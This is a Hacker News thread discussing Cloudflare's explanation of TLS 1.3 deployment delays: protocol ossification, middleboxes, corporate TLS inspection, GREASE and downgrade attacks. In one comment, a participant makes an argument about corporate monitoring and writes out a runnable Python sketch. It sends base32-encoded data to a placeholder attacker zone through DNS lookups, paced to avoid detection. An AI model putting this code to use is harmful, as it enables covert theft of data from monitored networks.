
Why TLS 1.3 isn't in browsers yet - el_duderino
https://blog.cloudflare.com/why-tls-1-3-isnt-in-browsers-yet/
======
quotemstr
The ossification phenomenon happens to all sorts of APIs. Consider stat(2):
all hell would break loose if we introduced another file type for st_mode. I'm
a fan of keeping things "well oiled" by exercising extension points that are
supposed to keep working.
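
A minimal sketch (Python, POSIX) of the kind of code that ossifies st_mode:
anything that switches exhaustively over the known S_IF* types breaks the
moment a new one appears.

    import os, stat

    def classify(path):
        mode = os.lstat(path).st_mode
        if stat.S_ISREG(mode):  return "regular file"
        if stat.S_ISDIR(mode):  return "directory"
        if stat.S_ISLNK(mode):  return "symlink"
        if stat.S_ISFIFO(mode): return "fifo"
        if stat.S_ISSOCK(mode): return "socket"
        if stat.S_ISCHR(mode) or stat.S_ISBLK(mode): return "device"
        raise ValueError("unknown file type")  # any new S_IF* lands here

    print(classify("/tmp"))  # directory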

That said, I wish we would be more willing to force these rusted joints to
open, breakage be damned. Breaking 3% of the web sounds like a lot, but it's
not that much, especially considering that anyone broken will very quickly
upgrade.

By using the elaborate workarounds described in the article, we recognize and
reward the worst technical practices. The author may not want to cast blame,
but I do.

~~~
pornel
Web breakage is a Prisoner's Dilemma. Unless all major vendors agree to break
the same thing at the same time, the one that "defects" to being compatible
with garbage will seem more reliable to users. Remember, most users don't know
what TLS is, but they care whether the page they wanted to see opens "fine" or
shows scary errors.

We've been there with CSS box model, DOM levels, (X)HTML(5), and CSS prefixes.
There have been some cases of cooperation, e.g. SHA-1 certs and kicking out
bad CAs, but most of the time browser vendors only "break" things gradually
and only when it affects < 0.1% of users.

~~~
0xcde4c3db
> We've been there with CSS box model, DOM levels, (X)HTML(5), and CSS
> prefixes.

Other examples:

Content-Type. There were a few years where many sites were misconfigured to
serve virtually every non-HTML file as text/plain. IE, deviating from the HTTP
spec, always used its own algorithm to detect the actual file type and thus
"worked", whereas Netscape (and later Mozilla) respected the header and would
display "garbage".

Windows-1252 mojibake. Various Windows-based authoring tools simply used the
native Windows code page 1252 to encode their text in HTML files, which were
then declared to be encoded as ASCII or ISO 8859-1. This led to documents
that _mostly_ looked correct but had garbage sprinkled around wherever the
author used punctuation that exists only in Windows-1252 (primarily the
distinct open/close quotes and em dashes, if memory serves). IE of course
handled these "correctly", i.e. interpreted ASCII or ISO 8859-1 to mean
Windows-1252. I think this behavior is now specified by HTML5 under certain
conditions.
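
The mismatch is easy to reproduce (a quick Python sketch):

    # 0x93/0x94 are curly quotes in Windows-1252 but unused C1 control
    # codes in ISO 8859-1, hence the sprinkled garbage.
    data = "\u201chello\u201d".encode("cp1252")  # b'\x93hello\x94'
    print(data.decode("latin-1"))  # strict 8859-1: control-char junk
    print(data.decode("cp1252"))   # IE/HTML5 reading: curly-quoted hello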

~~~
dtech
> IE of course handled these "correctly", i.e. interpreted ASCII or ISO 8859-1
> to mean Windows-1252. I think this behavior is now specified by HTML5 under
> certain conditions.

You can leave out "under certain conditions"; the WHATWG spec just plain
specifies that the "iso-8859-1" label identifies the windows-1252 encoding
[1].

[1] [https://encoding.spec.whatwg.org/#names-and-labels](https://encoding.spec.whatwg.org/#names-and-labels)
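
Per that table, a whole family of latin-1-ish labels resolves to
windows-1252; a few rows, sketched as a dict:

    LABELS = {
        "ascii": "windows-1252",
        "us-ascii": "windows-1252",
        "iso-8859-1": "windows-1252",
        "latin1": "windows-1252",
    }
    print(LABELS["iso-8859-1"])  # windows-1252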

------
nimbius
"Middleboxes" is a pretty chicken shit definition of what are essentially
appliances that, at best, allow companies to spy on employees and at worst
enable despotic governments to target and crush dissent. My security should
not have to wait for the devices that seek to violate it.

~~~
unethical_ban
"Spy on employees" = Monitor the network activity of a sensitive, private
business network.

I'll give the same spiel I give every time proxies come up: I am a donor to
the EFF, a friend of privacy and the 4th Amendment, and I love the ACLU. I
also
recognize the legitimacy and importance of MITM proxies that inspect the
content of SSL on a corporate network. It's not despotic to deploy company
assets with company root CA certs that proxy TLS traffic to make sure a random
employee isn't uploading credit card data to Box.
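
The mechanics are visible from any client: the proxy terminates TLS and
re-signs with the corporate root, so the issuer of the certificate you
receive changes. A small Python check (box.com is just an example host):

    import socket, ssl

    ctx = ssl.create_default_context()
    with ctx.wrap_socket(socket.create_connection(("box.com", 443)),
                         server_hostname="box.com") as s:
        # On a proxied network this prints the company CA, not Box's CA.
        print(s.getpeercert()["issuer"])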

~~~
kodablah
> make sure a random employee isn't uploading credit card data to Box

Except you aren't making sure, and there are many ways sensitive data can be
exported. Let's be honest with ourselves here, these measures are often
implemented under the guise of security but really are just liability and risk
reduction approaches. The practical security benefit is very low IME,
especially considering the burdens these measures put on employees' ability to
work their best (and, as this article points out, burdens on others as well).

~~~
unethical_ban
Which is harder for a call center employee or server admin?

1) Upload a file via GDrive or Box

2) Base64-encode the data and send it to a remote DNS server over the course
of several days via TXT record requests (see the sketch below)
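
A hypothetical sketch of option 2, just to make the effort gap concrete
(exfil.example is a placeholder for an attacker-controlled zone, and it uses
A-record lookups from the standard library where real tooling would use TXT
queries):

    import base64, socket, time

    def exfiltrate(data: bytes, zone: str = "exfil.example") -> None:
        # Chunk the payload into DNS-safe labels (63 chars max each).
        encoded = base64.b32encode(data).decode().rstrip("=").lower()
        for i in range(0, len(encoded), 60):
            name = f"c{i}.{encoded[i:i + 60]}.{zone}"
            try:
                socket.gethostbyname(name)  # attacker's resolver logs it
            except OSError:
                pass  # NXDOMAIN is fine; the query still went out
            time.sleep(1)  # pace queries over days to avoid detection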

As another poster says, it's all about reduction of risk. It's about balance.
And on a corporate network that owns the workstation and server configuration,
running a root CA and installing its cert in the gold image is pretty easy
for the level of inspection and prevention it provides.

This is not the be-all and end-all of security, either. It's one of many
steps.

~~~
kodablah
I think it's mostly security theater without significant benefits. There are
many parallels with the TSA here. It's not about ease of implementation as
much as it's about employee trust. We shouldn't pretend that it doesn't also
scoop up personal communications. Or you can say "absolutely no personal
communications on the computer you use for 8 hours a day", if you're that
type of person. Many SMBs survive without these measures, yet somehow they're
sold as requirements by those with IT departments and the means. I hope
"byopc" and remote work become more popular.

~~~
unethical_ban
>Or you can say absolutely no personal communications using the computer you
use for 8 hours a day

Exactly. It's a company resource. Most people seem to have (or can afford) a
mobile device with cell/Wi-Fi connectivity. Why should you feel so privileged
to go to reddit, Gmail, Box, etc. on a bank network?

------
ncmncm
This article doesn't explain why they have so much trouble with versioning a
protocol that is quite a lot simpler than many IP protocols that work. They
shouldn't need GREASE, because anybody implementing TLS should be testing
against a dedicated server, identified in the RFC, that connects as a client
and jiggles all the knobs.
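
For reference, GREASE (RFC 8701) reserves sixteen code points of the form
0xNANA that clients inject into their hellos precisely to keep that joint
exercised:

    # The sixteen GREASE values: 0x0a0a, 0x1a1a, ..., 0xfafa
    grease = [(v << 8) | v for v in range(0x0a, 0x100, 0x10)]
    print([hex(g) for g in grease])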

What, no conformance testing address is in the RFC? There's your problem right
there.

To the conspiracy-minded among us, it is clear that "some people" don't want
progress on encrypted communications, and know just what percentage of devices
need to be intolerant of progress to stall adoption of fixes. Making browsers
treat dropped connections as part of the protocol was very convenient for
"those people". I.e., this is not (significantly) a matter of incompetent
implementers, this is an enemy attack. Deployment plans that assume good faith
by all parties fail under enemy attack.

As with everything cryptographic, a threat model is essential. Deployment is
as much a part of the system and attack surface as the ciphers.

~~~
skissane
> What, no conformance testing address is in the RFC? There's your problem
> right there.

The vast majority of RFCs don't have conformance testing suites. The IETF
focuses on interoperability testing, which demonstrates that independent
implementations work together for the major use cases; it doesn't test all
the edge cases (such as future version negotiation) that a good conformance
test would.

Creating and maintaining a conformance test is an order of magnitude more work
than creating or maintaining a specification.

Someone has to be willing to expend the effort, and that usually means it has
to make economic sense, and it rarely does.

And even when it does, in order to gain funding it often has to be licensed on
commercial terms, which puts it out of reach of a lot of open source projects
and smaller commercial implementors. (Even many large companies wouldn't pay
for a test suite unless customers start putting it in RFPs.)

NIST used to maintain a whole bunch of free conformance test suites (CGM,
COBOL, FORTRAN, PHIGS, POSIX, SQL), but the US government decided to stop
paying for that.

~~~
gsnedders
The WHATWG and the W3C have been moving in a very different direction,
treating testing as a major part of spec development, because the goal is to
get implementations of the specifications, and how do you determine that if
not by testing?

[https://blog.whatwg.org/improving-interoperability](https://blog.whatwg.org/improving-interoperability)
is a post from the WHATWG side about this, and the outcome isn't just the
direct "it's easier to write code against tests" but also "it's easier to
notice when the spec changes" (because you now get a failing test).

~~~
pas
Usually IETF WG members do test and implement (they run their modified
versions somewhere), but none of that information becomes part of the
standard.

------
saurik
> When presented with a client hello with version 3.4, a large percentage of
> TLS 1.2-capable servers would disconnect instead of replying with 3.3.

As someone who has implemented a ton of protocols, I honestly don't understand
how anyone even does something this stupid.
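
For context, the pre-1.3 rule those servers failed to implement is a
one-liner (a sketch, with versions as their wire values):

    SERVER_MAX = 0x0303  # TLS 1.2, "3.3" on the wire

    def choose_version(client_version: int) -> int:
        # Reply with min(client, server max); a 3.4 hello must get a
        # 3.3 answer, not a dropped connection.
        return min(client_version, SERVER_MAX)

    assert choose_version(0x0304) == 0x0303  # TLS 1.3 client, 1.2 server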

~~~
cesarb
It's the "fail closed" principle in action: if I don't understand it, it must
be malicious, so the connection should be rejected as swiftly as possible.

Also seen in firewalls which drop all ICMP packets ("the only real-world use
of ICMP is ping floods, right?"), breaking PMTUD.
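
Even a drop-everything firewall should leave PMTUD working; with Linux
iptables, for instance, that's a single rule ahead of the blanket drop:

    # Allow ICMP "fragmentation needed" (type 3, code 4), which PMTUD
    # depends on.
    iptables -A INPUT -p icmp --icmp-type fragmentation-needed -j ACCEPT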

~~~
jchw
But this isn't fail-closed. The specification allows for newer versions. The
problem is, you are supposed to spit back the version you actually support
instead of disconnecting. I don't understand how this can be interpreted as
anything but non-compliance with the standard.

~~~
Spivak
I would say that technically it's compliant, because there's nothing saying
a server can't tear down a connection whenever it wants.

Our InfoSec friends are rightfully suspicious of "weird"-looking packets and
data from clients. It's one of the few ways to catch/stop zero-day vulns. It
does make things difficult when legitimate traffic is caught in the
crossfire, but such is the nature of most security practices.

------
misterbowfinger
Ugh, why did they have to use Flash...

[https://tls13.mitm.watch/](https://tls13.mitm.watch/)

I know they mention it here:

> It uses Adobe Flash, because that’s the only widespread cross-platform way
> to get access to raw sockets from a browser.

But there's really no other way???

~~~
roblabla
That's actually a huge annoyance of mine. There's no stable, cross-platform
web API to get raw sockets, and I'm not sure why.

~~~
QasimK
Imagine if every webpage (JavaScript) could open sockets to any location and
port - sounds like a significant security issue.

~~~
banachtarski
They essentially can via the WebRTC api, albeit in a more cumbersome way.
There's nothing inherently insecure about it and the onus rests on the serving
party and the browser itself to ensure no foul play is happening.

~~~
lmz
Doesn't WebRTC have a handshake protocol to ensure that the other end expects
the WebRTC media stream?

~~~
banachtarski
If you allow a browser to open sockets to random places, it's the exact same
principle! The onus is on the listener to ensure that the people communicating
respect the agreed upon protocol.

~~~
tokenizerrr
Then every browser could be used to send spam. It would be horrible. Imagine
every person who visits a compromised page immediately starting to send spam
emails over SMTP, or spam IRC messages.

~~~
roblabla
Flash could do that, and yet I've never heard of it as a problem.

~~~
jhgg
Generally it's not a problem, as Flash checks a file called
"crossdomain.xml" served from the destination server, which specifies how
Flash may communicate with it.

[http://www.adobe.com/devnet/articles/crossdomain_policy_file...](http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html)
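
A socket policy file looks roughly like this (example domain and ports;
served from port 843 on the destination host):

    <?xml version="1.0"?>
    <cross-domain-policy>
      <!-- only SWFs served from *.example.com may open sockets here -->
      <allow-access-from domain="*.example.com" to-ports="443,8443"/>
    </cross-domain-policy>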

------
newman314
Sigh. I'm leading an effort to clean up TLS company-wide and it's a
nightmare.

I get why some people want middleboxes but honestly, I'd rather TLS 1.3 take
the opportunity to clean things up instead of coming up with workarounds for
fallback.

------
user5994461
>>> To help support this discussion with data, we built a tool to help check
if your network is compatible with TLS 1.3:
[https://tls13.mitm.watch/](https://tls13.mitm.watch/)

The name is so terrible that I can't tell if it's malware or a porn site.

If anyone from cloudflare is reading, please host your project on something
legit. tls13test.cloudflare.com or whatever.

~~~
Buge
The downside of hosting things all in the same domain is that cookies are
shared between them, so a vulnerability in one site (e.g. XSS) leads to
compromise of all sites. Choosing different domains means they are sandboxed
and safe from each other.

Any domain name could be used to host porn. But not any domain name can get
linked from a cloudflare blog. I think the fact that it's linked from
cloudflare's blog should indicate that it's fine.

~~~
tombrossman
> The downside of hosting things all in the same domain is that cookies are
> shared between them, so a vulnerability in one site (e.g. XSS) leads to
> compromise of all sites. Choosing different domains means they are sandboxed
> and safe from each other.

I believe this is incorrect. Cookies should only be shared (by default) if the
domain matches exactly, which is why it's best practice to use a www subdomain
instead of the bare domain. For example, www.example.com cookies will not be
sent to test.example.com by default, though a cookie can opt in via the
Domain attribute. See here for a fuller explanation:
[https://stackoverflow.com/a/23086139](https://stackoverflow.com/a/23086139)
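
The difference shows up in the Set-Cookie header (hypothetical values):

    Set-Cookie: session=abc123                      # host-only cookie
    Set-Cookie: session=abc123; Domain=example.com  # sent to subdomains too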

~~~
mkonecny
It is incorrect. Read why personal github pages (username.github.com) moved to
github.io (username.github.io)

[https://github.com/blog/1452-new-github-pages-domain-github-io](https://github.com/blog/1452-new-github-pages-domain-github-io)

~~~
pas
That only concerns writing cookies (a subdomain can still set cookies for
the parent domain), but separation via a completely different domain is still
best practice.

------
yeukhon
> There is no signal to developers that an implementation is flawed, and so
> mistakes can happen without being noticed. That is, until a new version of
> the protocol is deployed and your implementation fails, but by then the code
> is deployed and it could take years for everyone to upgrade.

> If a protocol is designed with a flexible structure, but that flexibility is
> never used in practice, some implementation is going to assume it is
> constant.

Perhaps this is a naive thought. I remember several years ago Mozilla
announced that its experimental browser rendering engine (Servo) passed the
Acid2 test [1]. So why can't we come together and create similar standard
tests, so that server implementers and middlebox implementers are encouraged
to include them as part of their QA process?

I know this would be optional. There is no mandate, but it sounds like a
start. Isn't there some network vendor organization the major players are
part of?

[1]: [https://research.mozilla.org/2014/04/17/another-big-mileston...](https://research.mozilla.org/2014/04/17/another-big-milestone-for-servo-acid2/)

------
snvzz
I say: just break middleboxes. Do it well. Red padlock: "TLS connection
downgraded because of a middlebox".

This shit shouldn't exist in the first place. Routers shouldn't look past the
layer 3 headers of the packet.

------
atesti
To me it sounds like re-enabling the fallback (trying TLS 1.2 after TLS 1.3
fails for a connection) would be the best way to gradually upgrade all
devices.

~~~
kalleboo
The article says "Browsers did not want to re-enable the insecure downgrade
and fight the uphill battle of oiling the protocol negotiation joint again for
the next half-decade." So I guess the natural solution to that is making the
TLS protocol a User-Agent-esque nightmare of compatibility patches and
pretending to support something you don't, which surely WON'T come back to
bite them in the ass years down the line...

~~~
wav-part
1.2 is still secure. This downgrading/oiling is simple and works for all
future versions.

TLS is already so complex, and ASN.1 makes XML look like a C struct. This
raises the question: why would anyone want to make crypto overly complex?

------
sloxy
Site is down for maintenance. Cache:
[http://webcache.googleusercontent.com/search?q=cache:BQlyePw...](http://webcache.googleusercontent.com/search?q=cache:BQlyePwWdUoJ:blog.cloudflare.com/why-tls-1-3-isnt-in-browsers-yet/)

------
user5994461
Meanwhile, still supporting TLS 1.0 because of Office 2010.

------
ori_b
It hasn't even been released yet.

~~~
QasimK
This is essentially explaining why it hasn’t been released.

------
wav-part
I don't get the crisis. If 3% disconnect with 1.3, then retry with secure
1.2. It's only a performance penalty for those 3%, which is obviously less
than the let's-talk-about-it penalty.

~~~
MaulingMonkey
The article calls this "insecure downgrade" - which is not just the
performance penalty you say it is, it's also a security penalty that's been
previously (ab)used via POODLE. It's also code that's been removed and would
need re-implementing, re-testing, etc.

The only crisis the article mentions - in passing at that - is when they tried
to roll out 1.3 initially and things broke outright at alarmingly high rates.
Whoever wrote the article appears to be a fan of discussing things before
they turn into crises.

~~~
wav-part
How is downgrading to _secure 1.2_ insecure? Regarding SSLv3: why would a
client ever use it, downgrade/POODLE or not?

This is literally very simple, a few lines of patch. It's basically TLS
server discovery.

It's a crisis when an upgrade makes 3% of webservers stop working.

~~~
rocqua
It means anyone with a MitM position gets to decide you don't have TLS 1.3.
At that point, why even have TLS 1.3? It's not protecting you any more than
TLS 1.2 is.

~~~
wav-part
> _It means anyone with a MitM position gets to decide you don't have TLS
> 1.3._

So what? 1.2 is not weak. The connection is still secure.

Also, the MITM still gets to decide whether you have TLS at all. Then "why
even have TLS?". If a MITM is blocking a protocol (or a higher version, which
is equivalent), then there is nothing to be done.

~~~
rocqua
HSTS was created specifically to prevent the MITM from downgrading HTTPS to
HTTP.
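
For reference, that's a single response header, e.g.:

    Strict-Transport-Security: max-age=31536000; includeSubDomains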

As for MITM blocking a protocol, that is a noticeable situation, and one that
does not give the attacker any control over the cryptography used on sensitive
data. A downgrade attack is very different from blocking a protocol. The user
doesn't notice, and the attacker gains some control over the cryptography
used.

In the end, what sense does it make to have a TLS version an attacker can
opt out of? All you get is defence against passive MitM. Until TLS 1.2 stops
keeping us safe against those passive MitM, it makes no sense to rush TLS
1.3. Especially because that rush would really hurt when it turns out TLS 1.2
is insecure, at which point the rushed solution becomes vulnerable to all
active MitM attacks.

Now consider, what level of access to infrastructure only allows for passive
MitM?

~~~
wav-part
> _The user doesn't notice, and the attacker gains some control over the
> cryptography used._

In my case the user will notice, because the TLS client won't accept an
insecure version request. The connection breaks, and the client notifies the
user that the server is still using an insecure version.

I think this might be the misunderstanding: a good client/server never
establishes/accepts insecure versions.

Yes, the MITM gets to pick, but if it picks an insecure version, there is no
connection.

POODLE was never an attack on the protocol, but on poor implementations.

~~~
syncsynchalt
One misunderstanding is that you are accepting as fact that TLS 1.2 is secure,
when it's entirely plausible that one or more state actors already know that
not to be the case.

There's no magic light that goes on when the NSA breaks TLS 1.2 so that we
know to stop trusting it.

